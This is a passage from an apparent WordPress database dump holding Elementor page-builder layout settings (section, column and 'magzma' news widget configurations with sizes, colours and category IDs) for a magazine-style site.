_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1189,435,'_elementor_version','0.4'),(1190,435,'_elementor_css','a:3:{s:4:\"time\";i:1508877844;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1191,436,'_elementor_edit_mode','builder'),(1192,436,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\